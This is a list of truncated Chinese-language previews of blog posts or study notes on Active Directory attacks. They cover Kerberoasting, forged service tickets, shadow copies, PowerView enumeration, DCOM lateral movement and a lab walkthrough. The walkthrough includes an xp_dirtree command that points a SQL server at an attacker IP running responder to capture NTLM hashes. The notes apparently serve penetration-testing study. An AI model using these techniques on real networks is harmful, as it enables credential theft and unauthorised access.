回想一下 Kerberos 协议是如何工作的。我们知道，当用户想要访问由服务主体名称 (SPN)托管的资源时，客户端会请求由域控制器生成的服务票证。然后，服务票证由应用程序服务器解密和验证，因为它...

1. 密码攻击在探索这些攻击之前，我们需要考虑一个重要的因素。在执行暴力或单词列表身份验证攻击时，我们必须注意帐户锁定。登录失败次数过多可能会阻止帐户遭受进一步的攻击，并可能向系统管...

在对 Active Directory 身份验证执行攻击3中，我们获取并破解了 TGS-REP 哈希以检索 SPN 的明文密码。我们将更进一步，伪造我们自己的服务票证。 Kerberos 身份验证的内部工作原理，在服务帐户...

shadow copy 也被称作 Volume Shadow Service (VSS)是一种 Microsoft 备份技术，允许创建文件或整个卷的快照。为了管理卷影副本，Microsoft 签名的二进制文件 vshadow.exe作为Windows SDK 的...

我 们 将 使 用 PowerView 的 Find-DomainShare 功 能 来 查 找 域 中 的 共 享 。 我 们 还 可 以 添 加 -CheckShareAccess 标志来显示仅供我们使用的共享。但是，我们现在将跳过此标志以返回...

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...

我们方法中合乎逻辑的下一步是破解我们获得的任何密码哈希值，并使用明文密码对计算机进行身份验证，以获得未经授权的访问。然而，密码破解需要时间并且可能会失败。此外，Kerberos和 NTLM 不直...

我们将检查一种相当新的横向移动技术，该技术利用分布式组件对象模型 (DCOM)Microsoft 组件对象模型 (COM)是一个用于创建相互交互的软件组件的系统。虽然 COM 是为同进程或跨进程交互而创建的，...

PowerView脚本#requires -version 2 <# PowerSploit File: PowerView.ps1 Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None #> ##################...

独立应用程序可以使用一组预定义的服务帐户，例如LocalSystem、LocalService、和 NetworkService。对于更复杂的应用程序，可以使用域用户帐户来提供所需的上下文，同时仍然保持对域内资源的访问...